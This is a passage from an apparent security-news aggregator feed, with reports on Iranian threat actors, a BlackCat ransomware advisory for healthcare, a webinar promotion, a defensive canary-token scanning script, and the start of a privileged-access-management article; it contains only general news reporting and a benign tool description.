critical infrastructure, Israeli aerial projectile warning systems, and activity intended for information operation purposes in 2023."</p> <p>This includes Banished Kitten, which unleashed the <a href="https://thehackernews.com/2023/11/new-bibi-windows-wiper-targets-windows.html" rel="nofollow" target="_blank">BiBi wiper malware</a>, and Vengeful Kitten, an alias for <a href="https://thehackernews.com/2023/01/researchers-uncover-connection-bw-moses.html" rel="nofollow" target="_blank">Moses Staff</a> that has claimed data-wiping activity against more than 20 companies' industrial control systems (ICS) in Israel.</p> <p>That said, Hamas-linked adversaries have been noticeably absent from <a href="https://thehackernews.com/2024/02/iran-and-hezbollah-hackers-launch.html" rel="nofollow" target="_blank">conflict-related activity</a>, something the cybersecurity firm has attributed to likely power and internet disruptions in the region.</p> <br/> <div class="stophere" id="hiddenH1"></div> <div class="cf note-b">Found this article interesting? Follow us on <a href="https://twitter.com/thehackersnews" rel="nofollow" target="_blank">Twitter <i class="icon-font icon-twitter"></i></a> and <a href="https://www.linkedin.com/company/thehackernews/" rel="nofollow" target="_blank">LinkedIn</a> to read more exclusive content we post.</div> </div><br/><b>Source:</b> <a href="https://thehackernews.com/2024/02/iran-linked-unc1549-hackers-target.html" rel="nofollow" target="_blank">thehackernews.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-4619949882111848992024-02-28T05:44:00.001-08:002024-02-28T05:44:48.267-08:00FBI Warns U.S. Healthcare Sector Of Targeted BlackCat Ransomware Attacks<div style="clear: right; float: right; position: relative; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYLlh2RhlSoVcfl4JFUtr6GOFeLTAm1rHXy9nVAh6sJatf_F3jALEUdaMXW3mNCBfcXMtp3KvkOnaIuedAUmkGqMmZZ58mnrOVeM6n65HKsF2LnRScdHfPRpY7aKOo4-U8EEbx8FzHvO4/s1600/h91.png" imageanchor="1" rel="nofollow"><img border="0" height="2" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYLlh2RhlSoVcfl4JFUtr6GOFeLTAm1rHXy9nVAh6sJatf_F3jALEUdaMXW3mNCBfcXMtp3KvkOnaIuedAUmkGqMmZZ58mnrOVeM6n65HKsF2LnRScdHfPRpY7aKOo4-U8EEbx8FzHvO4/s1600/h91.png" width="2"/></a></div><div class="articlebody clear cf" id="articlebody"><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiukNpThGmmz9-8zmRGUTKJL6gtlyhpbhwRefdGHdH66jQQgaMHEKbIfpLQ7K5XFOhVL5CzKc9KcuYQP_UEu7iU2UQRpUvD1ogEMqMWwEbmuxzXM-CkWUNQX461hhQzhSt6ebjLiiiqq0Bilwh8KZ9KGZXyHZpb2KuCcqhYAdsw4zG8ur70ONEkbgYQTANE/s728-rw-e365/hacker.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="BlackCat Ransomware Attacks" border="0" data-original-height="380" data-original-width="728" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiukNpThGmmz9-8zmRGUTKJL6gtlyhpbhwRefdGHdH66jQQgaMHEKbIfpLQ7K5XFOhVL5CzKc9KcuYQP_UEu7iU2UQRpUvD1ogEMqMWwEbmuxzXM-CkWUNQX461hhQzhSt6ebjLiiiqq0Bilwh8KZ9KGZXyHZpb2KuCcqhYAdsw4zG8ur70ONEkbgYQTANE/s728-rw-e365/hacker.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="BlackCat Ransomware Attacks"/></a></div> <p>The U.S. government is warning about the resurgence of BlackCat (aka ALPHV) ransomware attacks targeting the healthcare sector as recently as this month.</p><a name='more'></a> <p>"Since mid-December 2023, of the nearly 70 leaked victims, the healthcare sector has been the most commonly victimized," the government <a href="https://www.cisa.gov/news-events/alerts/2024/02/27/cisa-fbi-and-hhs-release-update-stopransomware-advisory-alphv-blackcat" rel="nofollow" target="_blank">said</a> in an updated advisory.</p> <p>"This is likely in response to the ALPHV/BlackCat administrator's post encouraging its affiliates to target hospitals after operational action against the group and its infrastructure in early December 2023."</p> <p>The advisory comes from the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS).</p> <p>The BlackCat ransomware operation suffered a major blow late last year after a coordinated law enforcement operation led to the <a href="https://thehackernews.com/2023/12/fbi-takes-down-blackcat-ransomware.html" rel="nofollow" target="_blank">seizure of its dark leak sites</a>. But the takedown turned out to be a failure after the group managed to regain control of the sites and switched to a new TOR data leak portal that continues to remain active to date.</p> <p>It has also ramped up against critical infrastructure organizations in recent weeks, having claimed responsibility for attacks on Prudential Financial, LoanDepot, Trans-Northern Pipelines, and UnitedHealth Group subsidiary <a href="https://www.sec.gov/Archives/edgar/data/731766/000073176624000045/unh-20240221.htm" rel="nofollow" target="_blank">Optum</a>.</p> <p>The development has prompted the U.S. government to <a href="https://thehackernews.com/2024/02/cisa-warning-akira-ransomware.html" rel="nofollow" target="_blank">announce</a> financial rewards of up to $15 million for information leading to the identification of key members as well as affiliates of the e-crime group.</p> <div class="check_two clear bobbob"><center class="cf"><a href="https://thehackernews.uk/delinea728" rel="nofollow" target="_blank" title="Cybersecurity"><img alt="Cybersecurity" class="lazyload" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNFl0XFULXGgKLO8peSzZVqzrRFLL1K51a-m-G6uIJ_5KYJF3VkmlD8kLYYJbfF9RDGmWvinkoGe_YUnOdYnQoIe-rq2bEJ7Gcm7UjAHe3AsXed7FIGQcL6ecVaPInWYtwYQpmod0QvcVtoXiPtzDLzwVlBCSjBTOcP_4ZdpH-ExGJTcUGzTwR8BvCuBoD/s728-rw-e365/delinea728.jpg" height="90" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" width="727"/></a></center></div> <p>BlackCat's ransomware spree <a href="https://thehackernews.com/2024/02/lockbit-ransomware-group-resurfaces.html" rel="nofollow" target="_blank">coincides</a> with the return of LockBit after similar disruption efforts led by the U.K. National Crime Agency (NCA) last week.</p> <p>According to a <a href="https://www.scmagazine.com/news/exclusive-cyberattack-on-change-healthcare-was-an-exploit-of-the-connectwise-flaw" rel="nofollow" target="_blank">report</a> from SC Magazine, threat actors breached Optum's network by leveraging the <a href="https://thehackernews.com/2024/02/critical-flaws-found-in-connectwise.html" rel="nofollow" target="_blank">recently disclosed critical security flaws</a> in ConnectWise's ScreenConnect remote desktop and access software.</p> <p>The flaws, which allow for remote code execution on susceptible systems, have also been <a href="https://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html" rel="nofollow" target="_blank">weaponized</a> by the <a href="https://thehackernews.com/2024/01/free-decryptor-released-for-black-basta.html" rel="nofollow" target="_blank">Black Basta</a> and <a href="https://thehackernews.com/2023/05/bl00dy-ransomware-gang-strikes.html" rel="nofollow" target="_blank">Bl00dy</a> ransomware gangs as well as by other threat actors to deliver <a href="https://thehackernews.com/2023/04/microsoft-takes-legal-action-to-disrupt.html" rel="nofollow" target="_blank">Cobalt Strike Beacons</a>, <a href="https://thehackernews.com/2023/08/new-attack-alert-freezers-injector.html" rel="nofollow" target="_blank">XWorm</a>, and even other remote management tools like Atera, Syncro, and another ScreenConnect client.</p> <p>Attack surface management firm Censys said it observed more than 3,400 exposed potentially vulnerable ScreenConnect hosts online, with most of them located in the U.S., Canada, the U.K., Australia, Germany, France, India, the Netherlands, Turkey, and Ireland.</p> <div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_fPupicSF6e1yyaH_c-VPgbxtSRvPc5bgcOY9jRkm7gKoL8qtC6raN6b1hyphenhyphenkMe3rlWZlKIPCMZuLHslMVDBm6QE9rUgVgcfwZ9ncaxAjbx0VUmcURPmccMLx18gxNzNnaOIR1mcFNjv_9gLpZKoNINLF6HpQzg9-boTGet736XCra8EsViRTVIXqDYpvq/s728-rw-e365/trends.png" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="BlackCat Ransomware" border="0" data-original-height="590" data-original-width="1044" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_fPupicSF6e1yyaH_c-VPgbxtSRvPc5bgcOY9jRkm7gKoL8qtC6raN6b1hyphenhyphenkMe3rlWZlKIPCMZuLHslMVDBm6QE9rUgVgcfwZ9ncaxAjbx0VUmcURPmccMLx18gxNzNnaOIR1mcFNjv_9gLpZKoNINLF6HpQzg9-boTGet736XCra8EsViRTVIXqDYpvq/s728-rw-e365/trends.png" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="BlackCat Ransomware"/></a></div> <p>"It's clear that remote access software like ScreenConnect continues to be a prime target for threat actors," Censys security researcher Himaja Motheram <a href="https://censys.com/connectwise-screenconnect-cve-2024-1709-cve-2024-1708/" rel="nofollow" target="_blank">said</a>.</p> <p>The findings come as ransomware groups like <a href="https://thehackernews.com/2023/11/8base-group-deploying-new-phobos.html" rel="nofollow" target="_blank">RansomHouse</a>, <a href="https://thehackernews.com/2024/02/rhysida-ransomware-cracked-free.html" rel="nofollow" target="_blank">Rhysida</a>, and a Phobos variant called <a href="https://dnsc.ro/citeste/alert-backmydata-ransomware-spitale-romania" rel="nofollow" target="_blank">Backmydata</a> have continued to <a href="https://www.esentire.com/blog/rhysida-ransomware-group-turns-its-wrath-warns-esentire" rel="nofollow" target="_blank">compromise</a> various organizations in the U.S., U.K., Europe, and the Middle East. </p> <p>In a sign that these cybercrime groups are shifting to more nuanced and sophisticated tactics, RansomHouse has developed a custom tool dubbed MrAgent to deploy the file-encrypting malware at scale.</p> <div class="check_two clear bobbob"><center class="cf"><a href="https://thehackernews.uk/tcepdHrZ" rel="nofollow" target="_blank" title="Cybersecurity"><img alt="Cybersecurity" class="lazyload" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVhi7qr5Hen_9AjDa2uZMIW8b9hxydG5MpgkcamW6lADBts-QzcbwiMscCUSJ5ScLmTIt97I9Y7L3kFbXLlkt40DwhkyCLl3QrLwjViEZrbgNuTHnIjYcFmf8OHFIdfXzIxCoCJYxj8rokzFuM9fAuUhoKus7KPsedxq4k7CY9_-iZ3dtVRdB1DtqvdRIf/s728-rw-e365/cis-728.png" height="90" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" width="727"/></a></center></div> <p>"MrAgent is a binary designed to run on [VMware ESXi] hypervisors, with the sole purpose of automating and tracking the deployment of ransomware across large environments with a high number of hypervisor systems," Trellix <a href="https://www.trellix.com/blogs/research/ransomhouse-am-see/" rel="nofollow" target="_blank">said</a>. Details of MrAgent <a href="https://twitter.com/malwrhunterteam/status/1704972339790655736" rel="nofollow" target="_blank">first came to light</a> in September 2023.</p> <p>Another significant tactic adopted by some ransomware groups is the sale of direct network access as a new monetization method via their own blogs, on Telegram channels, or data leak websites, KELA <a href="https://www.kelacyber.com/more-than-data-ransomware-groups-are-now-selling-network-access-directly/" rel="nofollow" target="_blank">said</a>.</p> <p>It also follows the public release of a Linux-specific, C-based ransomware threat known as Kryptina, which surfaced in December 2023 on underground forums and has since been made available for free on BreachForums by its creator.</p> <div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxNrxQKJYxQgRhMNc6MvMCtQBeDhdU5OwKu_APE2AUBxx_QdvzeFjBxUtHsINDY9-m8j49Egva2VcJqvLfQlq2O8X5lxHfGhsYxGYj0lH1ZocjnYL_Ps_QKbA1nB_Lfd_P1Vaxs3CRovCJYM8iH9T1T74-L7F8wsoSz6_elFdYEaKs5UW1Vt5cbJvMq9e5/s728-rw-e365/Kryptina.png" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="BlackCat Ransomware" border="0" data-original-height="525" data-original-width="991" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxNrxQKJYxQgRhMNc6MvMCtQBeDhdU5OwKu_APE2AUBxx_QdvzeFjBxUtHsINDY9-m8j49Egva2VcJqvLfQlq2O8X5lxHfGhsYxGYj0lH1ZocjnYL_Ps_QKbA1nB_Lfd_P1Vaxs3CRovCJYM8iH9T1T74-L7F8wsoSz6_elFdYEaKs5UW1Vt5cbJvMq9e5/s728-rw-e365/Kryptina.png" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="BlackCat Ransomware"/></a></div> <p>"The release of the RaaS source code, complete with extensive documentation, could have significant implications for the spread and impact of ransomware attacks against Linux systems," SentinelOne researcher Jim Walter <a href="https://www.sentinelone.com/blog/kryptina-raas-from-underground-commodity-to-open-source-threat/" rel="nofollow" target="_blank">said</a>.</p> <p>"It is likely to increase the ransomware builder's attractiveness and usability, drawing in yet more low-skilled participants to the cybercrime ecosystem. There is also significant risk that it will lead to the development of multiple spin-offs and an increase in attacks."</p> <br/> <div class="stophere" id="hiddenH1"></div> <div class="cf note-b">Found this article interesting? Follow us on <a href="https://twitter.com/thehackersnews" rel="nofollow" target="_blank">Twitter <i class="icon-font icon-twitter"></i></a> and <a href="https://www.linkedin.com/company/thehackernews/" rel="nofollow" target="_blank">LinkedIn</a> to read more exclusive content we post.</div> </div><br/><b>Source:</b> <a href="https://thehackernews.com/2024/02/fbi-warns-us-healthcare-sector-of.html" rel="nofollow" target="_blank">thehackernews.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-85997485256187763312024-02-28T04:31:00.001-08:002024-02-28T04:31:18.337-08:00Building Your Privacy-Compliant Customer Data Platform (CDP) With First-Party Data<div style="clear: right; float: right; position: relative; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTtFUN2L6Nom1J0VOM_GCF7Yau-tI2rz6Ww8oxn1eBRZW_F_qYlZUf05SVKH0y9I3Y8POyh_1X5nOOSxYuBIWDGI725OUaSmHhx0aCsCF7L28uiCCkjCj8nnO2ZfZqa7SPj06mCN8wCMI/s1600/h80.png" imageanchor="1" rel="nofollow"><img border="0" height="2" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTtFUN2L6Nom1J0VOM_GCF7Yau-tI2rz6Ww8oxn1eBRZW_F_qYlZUf05SVKH0y9I3Y8POyh_1X5nOOSxYuBIWDGI725OUaSmHhx0aCsCF7L28uiCCkjCj8nnO2ZfZqa7SPj06mCN8wCMI/s1600/h80.png" width="2"/></a></div><div class="articlebody clear cf" id="articlebody"><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjekU7XcahU23ovu_89Z9cqz7mylVDYXpNb6ttWBfXYjfRXEcR7-4NaC8Hp3-azQKttgbliMyHLqrzcn4pSvUzLfujDSArgoN8ek1djzIEGT8Z_9KKt5z78U39bbSGaSTrZ4X7rYCi_9rXowrT9VwTRZ0axA90KZb44Py-0rVCMBAkOmkyAeXESdg7-sC3V/s728-rw-e30/tt.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="Privacy-Compliant Customer Data Platform (CDP)" border="0" data-original-height="380" data-original-width="728" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjekU7XcahU23ovu_89Z9cqz7mylVDYXpNb6ttWBfXYjfRXEcR7-4NaC8Hp3-azQKttgbliMyHLqrzcn4pSvUzLfujDSArgoN8ek1djzIEGT8Z_9KKt5z78U39bbSGaSTrZ4X7rYCi_9rXowrT9VwTRZ0axA90KZb44Py-0rVCMBAkOmkyAeXESdg7-sC3V/s728-rw-e365/tt.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="Privacy-Compliant Customer Data Platform (CDP)"/></a></div> <p>In today's digital era, data privacy isn't just a concern; it's a consumer demand. Businesses are grappling with the dual challenge of leveraging customer data for personalized experiences while navigating a maze of privacy regulations. The answer? A privacy-compliant Customer Data Platform (CDP).</p><a name='more'></a> <p><a href="https://thehacker.news/customer-data-platform?source=article" rel="nofollow" target="_blank">Join us for a transformative webinar</a> where we unveil Twilio Segment's state-of-the-art CDP. Discover how it champions compliant and consented data use, empowering you to craft a holistic customer view and revolutionize engagement strategies.</p> <h3 style="text-align: left;"><span style="font-size: 18.72px;">What Will You Learn?</span></h3> <ul> <li>Strategies for ethically democratizing data across your organization.</li> <li>The power of first-party data in unlocking profound customer insights.</li> <li>The pivotal role of a CDP in fostering compliant and consented data utilization.</li> <li>Proven customer engagement methodologies from industry leaders.</li> </ul> <h3 style="text-align: left;"><span style="font-size: 18.72px;">Why Should You Attend?</span></h3> <p>Twilio Segment's State of Personalization Report reveals a compelling truth: 63% of consumers welcome personalization, provided it stems from directly shared data.</p> <p>However, the phasing out of third-party cookies, the advent of privacy-centric browsers, and stringent regulations like GDPR have left businesses pondering how to personalize effectively within a privacy-first framework.</p> <h3 style="text-align: left;"><span style="font-size: 18.72px;">Don't Miss Out!</span></h3> <p>In an age where data privacy and compliance are not just buzzwords but imperatives, mastering the ethical management of customer data is crucial for businesses striving for excellence.</p> <style> .webi-a-box{ background-color: #f6f7fd; padding: 25px; border-radius: 10px; } .webi-a-box h2 { color: #333; margin-top: 0; } .webi-a-box .cta-button { display: inline-block; margin-top: 20px; padding: 10px 20px; background-color: #4469f5; color: #ffffff !important; border-radius: 5px; text-decoration: none; transition: background-color 0.3s ease; } </style> <div class="webi-a-box"><div>Ensure you're part of the conversation on building a privacy-compliant CDP with first-party data</div><a class="cta-button" href="https://thehacker.news/customer-data-platform?source=article" rel="nofollow">Reserve Your Webinar Spot ➜</a></div> <p>Circle your calendar for "<a href="https://thehacker.news/customer-data-platform?source=article" rel="nofollow" target="_blank">Building Your Privacy-Compliant Customer Data Platform (CDP) with First-Party Data</a>." Secure your spot now for an enlightening session you can't afford to miss!</p> <div count="4" id="trim-sidebar"></div> <br/> <div class="stophere" id="hiddenH1"></div> <div class="cf note-b">Found this article interesting? <span class="">This article is a contributed piece from one of our valued partners.</span> Follow us on <a href="https://twitter.com/thehackersnews" rel="nofollow" target="_blank">Twitter <i class="icon-font icon-twitter"></i></a> and <a href="https://www.linkedin.com/company/thehackernews/" rel="nofollow" target="_blank">LinkedIn</a> to read more exclusive content we post.</div> </div><br/><b>Source:</b> <a href="https://thehackernews.com/2024/02/building-your-privacy-compliant.html" rel="nofollow" target="_blank">thehackernews.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-10764931995460996852024-02-28T03:55:00.001-08:002024-02-28T03:55:20.606-08:00CanaryTokenScanner - Script Designed To Proactively Identify Canary Tokens Within Microsoft Office Documents And Acrobat Reader PDF (Docx, Xlsx, Pptx, Pdf)<div class="post-body entry-content" id="post-body-1164925407770700622" itemprop="articleBody"> <div style="margin:15px"> </div> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgwVXueB5F2b67Yyrfb_cROA2YmSiABp_GfA29nu62xPpn6hQz3DKfCKTb_GDjKZ6RNmBQF1Bv2hRbCODlOxt6r48okD8RUYr2XgFFS3a3bckQVfOjCQpX5Mqr52N3Cofk-ViPoqgf1SZ5PI6aUM-fFVvaHnWf5q9rXcTwmbmhVFNRGyFfinbcUC_gs4_AG" rel="nofollow"><img alt="" border="0" height="122" id="BLOGGER_PHOTO_ID_7337930840565836562" src="https://blogger.googleusercontent.com/img/a/AVvXsEgwVXueB5F2b67Yyrfb_cROA2YmSiABp_GfA29nu62xPpn6hQz3DKfCKTb_GDjKZ6RNmBQF1Bv2hRbCODlOxt6r48okD8RUYr2XgFFS3a3bckQVfOjCQpX5Mqr52N3Cofk-ViPoqgf1SZ5PI6aUM-fFVvaHnWf5q9rXcTwmbmhVFNRGyFfinbcUC_gs4_AG=w640-h122" width="640"/></a></p><div><br/></div><span style="font-size: large;"><b>Detecting Canary Tokens and Suspicious URLs in <a href="https://www.kitploit.com/search/label/Microsoft" rel="nofollow" target="_blank" title="Microsoft">Microsoft</a> Office, Acrobat Reader PDF and Zip Files</b></span><br/> <br/><b>Introduction</b><br/> <p>In the dynamic realm of cybersecurity, vigilance and proactive <a href="https://www.kitploit.com/search/label/Defense" rel="nofollow" target="_blank" title="defense">defense</a> are key. Malicious actors often leverage Microsoft Office files and Zip archives, embedding covert URLs or macros to initiate harmful actions. This Python script is crafted to detect potential threats by scrutinizing the contents of Microsoft Office documents, Acrobat Reader PDF documents and Zip files, reducing the risk of inadvertently triggering malicious code.</p><span><a name='more'></a></span><p><br/></p><b>Understanding the Script</b><br/> <br/><b>Identification</b><br/> <p>The script smartly identifies Microsoft Office documents (.docx, .xlsx, .pptx), Acrobat Reader PDF documents (.pdf) and Zip files. These file types, including Office documents, are zip archives that can be examined programmatically.</p> <br/><b>Decompression and Scanning</b><br/> <p>For both Office and Zip files, the script decompresses the contents into a temporary directory. It then scans these contents for URLs using regular expressions, searching for potential signs of compromise.</p> <br/><b>Ignoring Certain URLs</b><br/> <p>To minimize false positives, the script includes a list of domains to ignore, filtering out common URLs typically found in Office documents. This ensures focused <a href="https://www.kitploit.com/search/label/Analysis" rel="nofollow" target="_blank" title="analysis">analysis</a> on unusual or potentially harmful URLs.</p> <br/><b>Flagging Suspicious Files</b><br/> <p>Files with URLs not on the ignored list are marked as suspicious. This heuristic method allows for adaptability based on your specific security context and threat landscape.</p> <br/><b>Cleanup and Restoration</b><br/> <p>Post-scanning, the script cleans up by erasing temporary decompressed files, leaving no traces.</p> <br/><b>Usage</b><br/> <p>To effectively utilize the script:</p> <ol> <li><strong>Setup</strong></li> <li>Ensure Python is installed on your system.</li> <li>Position the script in an accessible location.</li> <li> <p>Execute the script with the command: <code>python CanaryTokenScanner.py FILE_OR_DIRECTORY_PATH</code> (Replace <code>FILE_OR_DIRECTORY_PATH</code> with the actual file or <a href="https://www.kitploit.com/search/label/Directory" rel="nofollow" target="_blank" title="directory">directory</a> path.)</p> </li> <li> <p><strong>Interpretation</strong></p> </li> <li>Examine the output. Remember, this script is a starting point; flagged documents might not be harmful, and not all malicious documents will be flagged. Manual examination and additional security measures are advisable.</li> </ol> <br/><b>Script Showcase</b><br/> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgwVXueB5F2b67Yyrfb_cROA2YmSiABp_GfA29nu62xPpn6hQz3DKfCKTb_GDjKZ6RNmBQF1Bv2hRbCODlOxt6r48okD8RUYr2XgFFS3a3bckQVfOjCQpX5Mqr52N3Cofk-ViPoqgf1SZ5PI6aUM-fFVvaHnWf5q9rXcTwmbmhVFNRGyFfinbcUC_gs4_AG" rel="nofollow"><img alt="" border="0" height="122" id="BLOGGER_PHOTO_ID_7337930840565836562" src="https://blogger.googleusercontent.com/img/a/AVvXsEgwVXueB5F2b67Yyrfb_cROA2YmSiABp_GfA29nu62xPpn6hQz3DKfCKTb_GDjKZ6RNmBQF1Bv2hRbCODlOxt6r48okD8RUYr2XgFFS3a3bckQVfOjCQpX5Mqr52N3Cofk-ViPoqgf1SZ5PI6aUM-fFVvaHnWf5q9rXcTwmbmhVFNRGyFfinbcUC_gs4_AG=w640-h122" width="640"/></a> </p><p style="text-align: center;"><em>An example of the Canary Token Scanner script in action, demonstrating its capability to detect suspicious URLs.</em></p> <br/><b>Disclaimer</b><br/> <p>This script is intended for educational and security testing purposes only. Utilize it responsibly and in <a href="https://www.kitploit.com/search/label/Compliance" rel="nofollow" target="_blank" title="compliance">compliance</a> with applicable laws and regulations.</p><br/><br/><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/0xNslabs/CanaryTokenScanner" rel="nofollow" target="_blank" title="Download CanaryTokenScanner">Download CanaryTokenScanner</a></span></b></div> </div><br/><b>Source:</b> <a href="http://www.kitploit.com/2024/02/canarytokenscanner-script-designed-to.html" rel="nofollow" target="_blank">www.kitploit.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-23604899619613751602024-02-28T02:46:00.001-08:002024-02-28T02:46:26.994-08:00Superusers Need Super Protection: How To Bridge Privileged Access Management And Identity Management<div style="clear: right; float: right; position: relative; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6Z3Lhr8Aq5JjxmH8V-BadsZO4eoA0mKoTWC3E5HmsRma9rUQa_tVm0-FMSdfxzrBr_mzlOR0IeUzXBddGGab0SACS8sbN3x4zLi_p9e-5kYSvrmmeE1VhgQURP8ggP2hJEeekom6OG5o/s1600/h23.png" imageanchor="1" rel="nofollow"><img border="0" height="2" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6Z3Lhr8Aq5JjxmH8V-BadsZO4eoA0mKoTWC3E5HmsRma9rUQa_tVm0-FMSdfxzrBr_mzlOR0IeUzXBddGGab0SACS8sbN3x4zLi_p9e-5kYSvrmmeE1VhgQURP8ggP2hJEeekom6OG5o/s1600/h23.png" width="2"/></a></div><div class="articlebody clear cf" id="articlebody"><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb1Ev1Ia07h2BSBbjByAnMMa-ye3w5KcgJJybQq_ZYLBztiUKxx1JOn29C8EYqKV4JepekvUmD8U0ar8XnNrlenjBflT_abc82AtyV-NUH3Q3dztvBPqc5pMSeDygTAY3eae96pT-X_Msb1B5HWMmYZXD3KQQfis4ZatyFxYXRwej_z6sLnnB-qwqT4jE/s728-rw-e365/ssh.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="Privileged Access Management" border="0" data-original-height="380" data-original-width="728" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb1Ev1Ia07h2BSBbjByAnMMa-ye3w5KcgJJybQq_ZYLBztiUKxx1JOn29C8EYqKV4JepekvUmD8U0ar8XnNrlenjBflT_abc82AtyV-NUH3Q3dztvBPqc5pMSeDygTAY3eae96pT-X_Msb1B5HWMmYZXD3KQQfis4ZatyFxYXRwej_z6sLnnB-qwqT4jE/s728-rw-e365/ssh.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="Privileged Access Management"/></a></div> <p>Traditional perimeter-based security has become costly and ineffective. As a result, communications security between people, systems, and networks is more important than blocking access with firewalls.<strong> On top of that, most cybersecurity risks are caused by just a few superusers – typically one out of 200 users.</strong> There's a company aiming to fix the gap between traditional PAM and IdM solutions and secure your one out of 200 users – <a href="https://www.ssh.com/solutions/entra-id-and-privileged-access-management-with-zero-trust-suite?hsCtaTracking=998a35ae-4bc1-45f1-8ac5-ec89f0d01747%7C7b915d01-0094-4749-b1c3-7ac324cd68ba" rel="nofollow" target="_blank">SSH Communications Security.</a> </p><a name='more'></a> <p>Your Privileged Access Management (PAM) and Identity Management (IdM) should work hand in hand to secure your users' access and identities – regular users and privileged users alike. But traditional solutions struggle to achieve that. </p> <div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9byts1ABdyKsqkMU1K7py3V0VorYfbxm2aG4vLLHDIKMaWhOpKgg98uN0Vjp5QNKgA4jKK0jlGqct74xt1ZPfkxITYfx6WTicnS55P6RejFVbBp-1LWtmMTrx6Bq5qEfHQpUzusBFwYUN7_E4mohTaW-NqdpHQdPFsTm7WyQTRh8t9I-3T6v3TfLqfVY/s728-rw-e365/ssh-2.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="Privileged Access Management" border="0" data-original-height="1080" data-original-width="2083" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9byts1ABdyKsqkMU1K7py3V0VorYfbxm2aG4vLLHDIKMaWhOpKgg98uN0Vjp5QNKgA4jKK0jlGqct74xt1ZPfkxITYfx6WTicnS55P6RejFVbBp-1LWtmMTrx6Bq5qEfHQpUzusBFwYUN7_E4mohTaW-NqdpHQdPFsTm7WyQTRh8t9I-3T6v3TfLqfVY/s728-rw-e365/ssh-2.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="Privileged Access Management"/></a></div> <p>Let's look at what organizations need to understand about PAM and IdM and how you can bridge and future-proof your PAM and IdM.</p> <h2 style="text-align: left;"><strong>PIM, PAM, IAM – you need all three of them</strong></h2> <p>Privileged Identity Management (PIM), Privileged Access Management (PAM), and Identity and Access Management (IAM) - all three are closely connected, and you need all three of them to effectively manage and secure your digital identities, users and access. </p> <p>Let's quickly review what PIM, PAM, and IAM focus on: </p> <p></p><ul style="text-align: left;"><li>PIM – management of root user identities and authorizations </li><li><a href="https://www.ssh.com/products/privileged-access-management-privx" rel="nofollow" target="_blank">PAM – management of root user access to critical resources and auditing</a> </li><li>IAM – management of basic user identities, authorizations, and access to resources</li></ul><p></p> <h2 style="text-align: 